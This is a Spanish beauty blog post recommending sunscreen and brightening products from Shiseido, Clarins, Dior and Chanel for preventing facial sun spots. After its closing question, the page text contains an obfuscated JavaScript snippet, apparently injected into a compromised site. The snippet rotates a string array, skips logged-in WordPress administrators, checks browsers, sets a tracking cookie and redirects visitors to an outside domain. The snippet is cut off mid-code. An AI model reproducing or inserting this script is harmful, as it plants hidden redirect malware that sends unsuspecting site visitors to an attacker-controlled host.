¡Por fin llega el buen tiempo y los rayos del sol inundan la ciudad! Pero cuidado, también es época de cuidar y proteger la piel más de lo habitual si no queremos padecer las temidas manchas que causa el sol en nuestra piel. Algunas son oscuras, otras son pequeños puntitos en zonas localizadas del rostro, pero todas tienen algo en común: no las queremos en nuestra cara. ¿Te suena lo que te estamos contando? Pues no te duermas en los laureles y aprovecha que aún tienes tiempo, para preparar la tez para la llegada del buen tiempo.

como_prevenir_manchas_en_la_cara

 

Evita que la piel envejezca prematuramente

El sol es el responsable de aumentar la producción de melanina y eso hace que aparezcan zonas especialmente afectadas por las manchas y que incluso manchas que estaban “olvidadas y escondidas” durante el invierno, comiencen a aflorar. Antes de que nos pille el toro, hay que prevenir con algunos consejos y tratamientos específicos que contengan un alto grado de protección.

Por ejemplo, Urban Protection SPF50 de Shiseido es una crema muy agradable de aplicar que te protegerá durante todo el día no solo del sol, también de los agentes externos, gracias a su alto factor de protección. Además, te proporcionará la hidratación que necesitas y combatirá la aspereza y sequedad que muchas pieles presentan. Su agradable textura se absorbe rápidamente y es perfecta para aplicar como base de maquillaje, ya que es ligera y muy fresca.

comoprevenirmanchas

Si tu piel ya está castigada, puedes optar por usar Ecran Multi-Protection SPF50 de Clarins, pensado para aquellas pieles que ya tienen manchas de pigmentación por el sol y este tratamiento lo que hace es limitar que no se acentúen aún más. Desde su primera aplicación, notarás cómo tu dermis está especialmente protegida y poco a poco, irá recuperando la luminosidad y combatirá los efectos del envejecimiento prematuro de la misma.

 

Devuélvele el resplandor perdido a tu piel

Los malos hábitos e incluso haber utilizado los productos inadecuados hacen que tu piel pueda parecer apagada, sin resplandor y castigada. Aunque las marcas en la piel son muy difíciles de eliminar cuando ya están asentadas en la dermis, sí está en tu mano hacer que la cosa no vaya a más.

New Skin Effect Enzyme Solution de Dior es una loción facial que elimina las células muertas de la piel y atenúa las imperfecciones. Si además aplicas a continuación el serum, notarás cómo el efecto se multiplica. La magia de este producto está en el ingrediente natural de la papaya que se combina magistralmente con el poder antioxidante del lirio florentina. El resultado: una crema increíble que hidrata y aclara la piel al poco tiempo de usarla. Tras un mes de tratamiento, conseguirás devolverle a la piel su aspecto joven y olvidado.

comoprevenirmanchasdelacara

El cuidado de la piel no debe ser puntual, sino diario. Debemos introducir en nuestros hábitos el uso de un producto con protección solar. No importa que no haga sol, los rayos UV llegan a nuestra piel, impactando más severamente sobre aquellas dermis más sensibles. UV Essentiel de Chanel es un magnífico tratamiento diario de protección global UV-Polución SPF50 que preserva la piel de los agentes medioambientales: rayos UVA, polución o radicales libres. Es perfecto para pieles especialmente claras y sensibles, ya que su nivel de protección es muy alto. Notarás cómo tu piel se oxigena y se rejuvenece y deberás utilizarlo antes de aplicarte el maquillaje en rostro, cuello y escote.

 

¿Cómo cuidas tu piel con la llegada del sol? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone